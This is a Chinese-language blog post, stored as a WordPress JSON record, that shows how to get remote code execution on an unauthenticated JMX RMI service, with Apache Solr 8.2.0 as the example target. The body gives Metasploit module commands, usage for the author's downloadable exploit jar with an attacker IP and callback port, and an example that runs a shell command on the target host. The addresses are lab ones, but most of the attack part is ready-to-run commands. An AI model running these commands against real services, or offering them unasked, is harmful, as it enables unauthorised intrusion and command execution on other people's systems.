{"id":56,"date":"2019-11-20T18:46:54","date_gmt":"2019-11-20T10:46:54","guid":{"rendered":"http:\/\/blog.73007300.xyz\/?p=56"},"modified":"2019-12-13T22:50:59","modified_gmt":"2019-12-13T14:50:59","slug":"jmx-rmi%e6%94%bb%e5%87%bb%e8%8e%b7%e5%8f%96shell","status":"publish","type":"post","link":"https:\/\/blog.73007300.xyz\/?p=56","title":{"rendered":"JMX RMI \u5229\u7528 exploit RCE"},"content":{"rendered":"\n

\u524d\u63d0\uff1aJMX RMI \u4e0d\u9700\u8ba4\u8bc1<\/p>\n\n\n\n

\u4ee5apache solr 8.2.0 For linux\u4e3a\u4f8b\u3002 <\/p>\n\n\n\n

<\/p>\n\n\n\n

\u65b9\u6cd51\uff1a<\/p>\n\n\n\n

\u542f\u52a8\u9ed8\u8ba4\u6253\u5f00RMI\u7aef\u53e3\uff1a <\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

\u542f\u52a8msf\uff1a<\/p>\n\n\n\n

use exploit\/multi\/misc\/java_jmx_server \nset RHOSTS 192.168.23.128\nset RPORT 18983\nrun<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
 \u7406\u8bba\u4e0a\u5bf9JMX RMI\u66b4\u9732\u51fa\u6765\u7684\u672a\u8ba4\u8bc1\u7aef\u53e3\u901a\u5403\u3002 <\/p>\n\n\n\n
 \u65b9\u6cd52\uff1a <\/p>\n\n\n\n
 \u601d\u8def\uff1a <\/p>\n\n\n\n
\"\"
\u653b\u51fb\u4e3b\u8981\u5206\u56db\u6b65<\/figcaption><\/figure>\n\n\n\n
 \u6e90\u4ee3\u7801\uff1a<\/p>\n\n\n\n
https:\/\/gitlab.com\/han0x7300\/jmx_rmi_exploit<\/a><\/p>\n\n\n\n
 Usage: <\/p>\n\n\n\n
java -jar JMXRMIRCE.jar [attacker's ip] [attacker's port that can listern] [JMX RMI service ip] [JMX RMI service port] [command]<\/code><\/pre>\n\n\n\n
 Example: <\/p>\n\n\n\n
java -jar JMXRMIRCE.jar 192.168.23.154 4141 192.168.23.128 18983 \"cat \/etc\/os-release\"<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
 \u4e5f\u53ef\u4ee5\u76f4\u63a5\u7528\u6211\u6253\u5305\u597d\u7684jar\u5305\u3002jre 1.8\u53ef\u7528\u3002 <\/p>\n\n\n\n
\u53c2\u8003:\n * https:\/\/mogwailabs.de\/blog\/2019\/04\/attacking-rmi-based-jmx-services\/\n * https:\/\/www.bbsmax.com\/A\/Gkz1pPOQdR\/<\/pre>\n\n\n\n
<\/p>\n","protected":false},"excerpt":{"rendered":"
\u524d\u63d0\uff1aJMX RMI \u4e0d\u9700\u8ba4\u8bc1 \u4ee5apache solr 8.2.0 For linux\u4e3a\u4f8b\u3002 \u65b9\u6cd51\uff1a \u542f\u52a8\u9ed8\u8ba4\u6253\u5f00RMI\u7aef\u53e3\uff1a \u542f\u52a8msf\uff1a \u7406\u8bba\u4e0a\u5bf9JMX RMI\u66b4\u9732\u51fa\u6765\u7684\u672a\u8ba4\u8bc1\u7aef\u53e3\u901a\u5403\u3002 \u65b9\u6cd52\uff1a \u601d\u8def\uff1a \u6e90\u4ee3\u7801\uff1a https:\/\/gitlab.com\/han0x7300\/jmx_rmi_exploit Usage: Example: java -jar JMXRMIRCE.jar 192.168.23.154 4141 192.168.23.128 18983 “cat \/etc\/os-release” \u4e5f\u53ef\u4ee5\u76f4\u63a5\u7528\u6211\u6253\u5305\u597d\u7684jar\u5305\u3002jre 1.8\u53ef\u7528\u3002 \u53c2\u8003: * https:\/\/mogwailabs.de\/blog\/2019\/04\/attacking-rmi-based-jmx-services\/ * https:\/\/www.bbsmax.com\/A\/Gkz1pPOQdR\/<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5,2],"tags":[],"_links":{"self":[{"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/posts\/56"}],"collection":[{"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=56"}],"version-history":[{"count":8,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/posts\/56\/revisions"}],"predecessor-version":[{"id":68,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/posts\/56\/revisions\/68"}],"wp:attachment":[{"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=56"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=56"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=56"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}